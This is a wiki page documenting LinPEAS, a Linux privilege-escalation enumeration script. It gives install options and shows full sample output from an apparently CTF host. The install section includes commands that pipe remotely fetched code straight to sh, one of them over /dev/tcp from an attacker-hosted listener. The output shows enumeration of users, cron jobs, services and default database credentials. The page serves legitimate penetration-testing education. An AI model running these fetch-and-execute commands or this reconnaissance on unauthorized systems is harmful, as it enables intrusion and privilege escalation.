LinPEAS

From aldeid
Jump to navigation Jump to search

Description

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts

Installation

From github

$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

Local network

$ python -m SimpleHTTPServer 80
$ curl 10.10.10.10/linpeas.sh | sh

Without curl

$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sh

Output to file

$ linpeas -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt

Options

-h
To show this message
-q
Do not show banner
-a
All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly
-s
SuperFast (don't check some time consuming checks) - Stealth mode
-w
Wait execution between big blocks
-n
Do not export env variables related with history
-o
Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcs, Net, UsrI, SofI, IntFiles). Select a comma separated list.
-d <IP/NETMASK>
Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK>
Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>]
Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you select some network action, no PE check will be performed

Example

$ ./linpeas.sh -a | tee linepeas.txt


                     ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄▄
      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄
  ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄
  ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
  ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
  ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
  ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
  ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
  ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
  ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
  ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
  ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
  ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
  ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
   ▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄
        ▄▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄ 
             ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
    linpeas v2.5.0 by carlospolop

ADVISORY: linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 99% a PE vector
  RED: You must take a look at it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMangeta: Your username


====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic ([email protected]) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic ([email protected]) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04.4 LTS
Release:	16.04
Codename:	xenial

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16

[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

[+] Date
Thu Apr 30 04:22:33 EDT 2020

[+] System stats
Filesystem      Size  Used Avail Use% Mounted on
udev            224M     0  224M   0% /dev
tmpfs            49M  3.3M   46M   7% /run
/dev/xvda1       14G  2.4G   11G  19% /
tmpfs           244M  4.0K  244M   1% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           244M     0  244M   0% /sys/fs/cgroup
tmpfs            49M     0   49M   0% /run/user/1001
              total        used        free      shared  buff/cache   available
Mem:         498068      103444      160196        1712      234428      353216
Swap:       1045500      145340      900160

[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.9.35.106 51288 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=3
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.9.35.106 51288 10.10.226.157 22
HISTFILE=/dev/null

[+] Looking for Signature verification failed in dmseg
 Not Found

[+] selinux enabled? .............. sestatus Not Found
[+] Printer? ...................... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .............. Yes

=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)

[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf	/	ext4	errors=remount-ro	0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a	none	swap	sw	0 0


====================================( Available Software )====================================
[+] Useful software
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo

[+] Installed Compiler
/usr/share/gcc-5


================================( Processes, Cron, Services & Timers )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
daemon     849  0.0  0.3  26044  1956 ?        Ss   02:35   0:00 /usr/sbin/atd -f
jan      14284  0.0  0.4   4704  2052 pts/0    S+   04:22   0:00 /bin/sh ./linpeas.sh -a
jan      14285  0.0  0.1   7296   668 pts/0    S+   04:22   0:00 tee linepeas.txt
jan      14477  0.0  0.6  37364  3280 pts/0    R+   04:22   0:00 ps aux
jan      14479  0.0  0.1  15808   772 pts/0    S+   04:22   0:00 sort
jan       2266  0.0  0.6  45276  3028 ?        Ss   04:16   0:00 /lib/systemd/systemd --user
jan       2269  0.0  0.3  61540  1664 ?        S    04:16   0:00 (sd-pam)
jan       2301  0.0  0.7  92832  3620 ?        S    04:16   0:00 sshd: [email protected]/0
jan       2302  0.0  1.0  22572  5088 pts/0    Ss   04:16   0:00 -bash
message+   824  0.0  0.7  42952  3560 ?        Ss   02:35   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root      1012  0.0  0.0   5220   116 ?        Ss   02:36   0:00 /sbin/iscsid
root      1013  0.0  0.7   5720  3516 ?        S<Ls 02:36   0:00 /sbin/iscsid
root         1  0.2  0.8  38088  4416 ?        Ss   02:35   0:18 /sbin/init
root      1110  0.0  0.3  15936  1568 tty1     Ss+  02:36   0:00 /sbin/agetty --noclear tty1 linux
root      1111  0.0  0.3  15752  1952 ttyS0    Ss+  02:36   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1142  0.0  0.7  71584  3592 ?        Ss   02:36   0:00 /usr/sbin/apache2 -k start
root      1224  0.0  0.7 240008  3932 ?        Ss   02:36   0:00 /usr/sbin/nmbd -D
root       356  0.0  0.6  27704  3000 ?        Ss   02:35   0:01 /lib/systemd/systemd-journald
root       395  0.0  0.2  94772  1272 ?        Ss   02:35   0:00 /sbin/lvmetad -f
root       411  0.0  0.7  44696  3612 ?        Ss   02:35   0:02 /lib/systemd/systemd-udevd
root       811  0.0  0.6  28620  3012 ?        Ss   02:35   0:00 /lib/systemd/systemd-logind
root       814  0.0  0.5  29008  2692 ?        Ss   02:35   0:00 /usr/sbin/cron -f
root       830  0.0  0.8 275896  4252 ?        Ssl  02:35   0:00 /usr/lib/accountsservice/accounts-daemon
root       837  0.0  2.0 277936 10024 ?        Ssl  02:35   0:00 /usr/lib/snapd/snapd
root       841  0.0  0.5 636820  2724 ?        Ssl  02:35   0:04 /usr/bin/lxcfs /var/lib/lxcfs/
root       846  0.0  0.1   4396   812 ?        Ss   02:35   0:00 /usr/sbin/acpid
root       872  0.0  0.7 277176  3956 ?        Ssl  02:35   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       873  0.0  0.0  13372   144 ?        Ss   02:35   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root       890  0.0  1.1 337920  5668 ?        Ss   02:36   0:00 /usr/sbin/smbd -D
root       902  0.0  0.7 329804  3628 ?        S    02:36   0:00 /usr/sbin/smbd -D
root       921  0.0  0.5  16124  2496 ?        Ss   02:36   0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       961  0.0  0.8 337920  4072 ?        S    02:36   0:00 /usr/sbin/smbd -D
root       981  0.0  0.8  65508  4224 ?        Ss   02:36   0:00 /usr/sbin/sshd -D
syslog     851  0.0  0.5 256392  2756 ?        Ssl  02:35   0:00 /usr/sbin/rsyslogd -n
systemd+   493  0.0  0.4 100324  2268 ?        Ssl  02:35   0:00 /lib/systemd/systemd-timesyncd
tomcat9    994  2.1  9.5 2539580 47444 ?       Sl   02:36   2:18 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
www-data  1145  0.0  0.8 820212  4132 ?        Sl   02:36   0:02 /usr/sbin/apache2 -k start
www-data  1146  0.0  0.7 623628  3896 ?        Sl   02:36   0:02 /usr/sbin/apache2 -k start

[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
   0 lrwxrwxrwx 1 root root    4 Apr 17  2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar  8  2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar  8  2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar  8  2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar  8  2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar  8  2018 /lib/systemd/systemd-udevd
 44K -rwxr-xr-x 1 root root  44K Nov 30  2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar  5  2018 /sbin/dhclient
   0 lrwxrwxrwx 1 root root   20 Mar  8  2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26  2017 /sbin/iscsid
 52K -rwxr-xr-x 1 root root  51K Apr 16  2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov  8  2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12  2017 /usr/bin/dbus-daemon
 20K -rwxr-xr-x 1 root root  19K Nov  8  2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
   0 lrwxrwxrwx 1 root root   15 Mar 14  2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
 16K -rwxr-xr-x 1 root root  15K Jan 17  2016 /usr/lib/policykit-1/polkitd
 21M -rwxr-xr-x 1 root root  21M Nov 30  2017 /usr/lib/snapd/snapd
 48K -rwxr-xr-x 1 root root  47K Apr  8  2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18  2017 /usr/sbin/apache2
 28K -rwxr-xr-x 1 root root  27K Jan 14  2016 /usr/sbin/atd
 44K -rwxr-xr-x 1 root root  44K Apr  5  2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar  7  2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr  5  2016 /usr/sbin/rsyslogd
 72K -rwxr-xr-x 1 root root  71K Mar  7  2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18  2018 /usr/sbin/sshd

[+] Different processes executed during 1 min (interesting is low number of repetitions)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs

[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  190 Apr 17  2018 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Apr 19  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rwxr-xr-x  1 root root  539 Apr  5  2016 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  383 Mar  7  2016 samba
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


[+] Services
[i] Search for outdated versions
 [ + ]  acpid
 [ + ]  apache-htcacheclean
 [ + ]  apache2
 [ + ]  apparmor
 [ + ]  apport
 [ + ]  atd
 [ - ]  bootmisc.sh
 [ - ]  checkfs.sh
 [ - ]  checkroot-bootclean.sh
 [ - ]  checkroot.sh
 [ + ]  console-setup
 [ + ]  cron
 [ - ]  cryptdisks
 [ - ]  cryptdisks-early
 [ + ]  dbus
 [ + ]  grub-common
 [ - ]  hostname.sh
 [ - ]  hwclock.sh
 [ + ]  irqbalance
 [ + ]  iscsid
 [ + ]  keyboard-setup
 [ - ]  killprocs
 [ + ]  kmod
 [ - ]  lvm2
 [ + ]  lvm2-lvmetad
 [ + ]  lvm2-lvmpolld
 [ + ]  lxcfs
 [ - ]  lxd
 [ + ]  mdadm
 [ - ]  mdadm-waitidle
 [ - ]  mountall-bootclean.sh
 [ - ]  mountall.sh
 [ - ]  mountdevsubfs.sh
 [ - ]  mountkernfs.sh
 [ - ]  mountnfs-bootclean.sh
 [ - ]  mountnfs.sh
 [ + ]  networking
 [ + ]  nmbd
 [ + ]  ondemand
 [ + ]  open-iscsi
 [ - ]  open-vm-tools
 [ - ]  plymouth
 [ - ]  plymouth-log
 [ + ]  procps
 [ + ]  rc.local
 [ + ]  resolvconf
 [ - ]  rsync
 [ + ]  rsyslog
 [ + ]  samba
 [ + ]  samba-ad-dc
 [ - ]  screen-cleanup
 [ - ]  sendsigs
 [ + ]  smbd
 [ + ]  ssh
 [ + ]  udev
 [ + ]  ufw
 [ - ]  umountfs
 [ - ]  umountnfs.sh
 [ - ]  umountroot
 [ + ]  unattended-upgrades
 [ + ]  urandom
 [ - ]  uuidd
 [ - ]  x11-common

[+] System timers
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Thu 2020-04-30 06:08:42 EDT  1h 44min left Thu 2020-04-30 02:35:53 EDT  1h 47min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Thu 2020-04-30 16:05:00 EDT  11h left      Thu 2020-04-30 02:35:53 EDT  1h 47min ago apt-daily.timer              apt-daily.service
Fri 2020-05-01 02:50:42 EDT  22h left      Thu 2020-04-30 02:50:42 EDT  1h 33min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-05-04 01:14:13 EDT  3 days left   Thu 2020-04-30 03:38:42 EDT  45min ago    snapd.refresh.timer          snapd.refresh.service
n/a                          n/a           n/a                          n/a          snapd.snap-repair.timer      snapd.snap-repair.service
n/a                          n/a           n/a                          n/a          ureadahead-stop.timer        ureadahead-stop.service


===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1	localhost
127.0.1.1	basic2

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal

[+] Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found

[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0      Link encap:Ethernet  HWaddr 02:c0:e9:ff:bc:ac  
          inet addr:10.10.226.157  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::c0:e9ff:feff:bcac/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:110790 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107628 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:10296501 (10.2 MB)  TX bytes:19616371 (19.6 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:228 errors:0 dropped:0 overruns:0 frame:0
          TX packets:228 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:16416 (16.4 KB)  TX bytes:16416 (16.4 KB)

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         ip-10-10-0-1.eu 0.0.0.0         UG    0      0        0 eth0
10.10.0.0       *               255.255.0.0     U     0      0        0 eth0

[+] Iptables rules
iptables rules Not Found

[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -               
tcp        0   3828 10.10.226.157:22        10.9.35.106:51288       ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::445                  :::*                    LISTEN      -               
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -               
tcp6       0      0 :::8009                 :::*                    LISTEN      -               
tcp6       0      0 :::139                  :::*                    LISTEN      -               
tcp6       0      0 :::8080                 :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
udp        0      0 10.10.255.255:137       0.0.0.0:*                           -               
udp        0      0 10.10.226.157:137       0.0.0.0:*                           -               
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -               
udp        0      0 10.10.255.255:138       0.0.0.0:*                           -               
udp        0      0 10.10.226.157:138       0.0.0.0:*                           -               
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:50228           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               

[+] Can I sniff with tcpdump?
No


====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)

[+] Do I have PGP keys?
gpg Not Found

[+] Clipboard or highlighted text?
xsel and xclip Not Found

[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands

[+] Checking /etc/doas.conf
/etc/doas.conf Not Found

[+] Checking Pkexec policy

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
It's not possible to brute-force su.

[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!

[+] Superusers
root:x:0:0:root:/root:/bin/bash

[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=1001(jan) gid=1001(jan) groups=1001(jan)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)
uid=9(news) gid=9(news) groups=9(news)

[+] Login now
 04:23:46 up  1:48,  1 user,  load average: 0.29, 0.24, 0.10
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
jan      pts/0    10.9.35.106      04:16    1:14   0.24s  0.00s w

[+] Last logons
kay      tty1                          Wed Apr 18 09:20 - down   (00:05)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:45 - 09:25  (19:39)
kay      tty1                          Wed Apr 18 09:02 - crash  (-19:-16)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:27 - 09:25  (19:58)
kay      tty1                          Tue Apr 17 13:21 - crash  (00:05)
reboot   system boot  4.4.0-119-generi Tue Apr 17 13:14 - 09:25  (20:10)
kay      tty1                          Tue Apr 17 13:05 - down   (00:08)
reboot   system boot  4.4.0-87-generic Tue Apr 17 13:00 - 13:14  (00:14)

wtmp begins Tue Apr 17 13:00:02 2018

[+] Last time logon each user
Username         Port     From             Latest
kay              pts/0    192.168.56.102   Mon Apr 23 16:04:07 -0400 2018
jan              pts/0    10.9.35.106      Thu Apr 30 04:16:21 -0400 2020

[+] Password policy
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


Caching directories . . . . . . . . . . . . . . . DONE
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found

[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
 Not Found

[+] PostgreSQL version and pgadmin credentials
 Not Found

[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No

[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built:   2017-09-18T15:09:02

[+] Looking for PHPCookies
 Not Found

[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found

[+] Looking for Tomcat users file
tomcat-users.xml Not Found

[+] Mongo information
 Not Found

[+] Looking for supervisord configuration file
supervisord.conf Not Found

[+] Looking for cesi configuration file
cesi.conf Not Found

[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
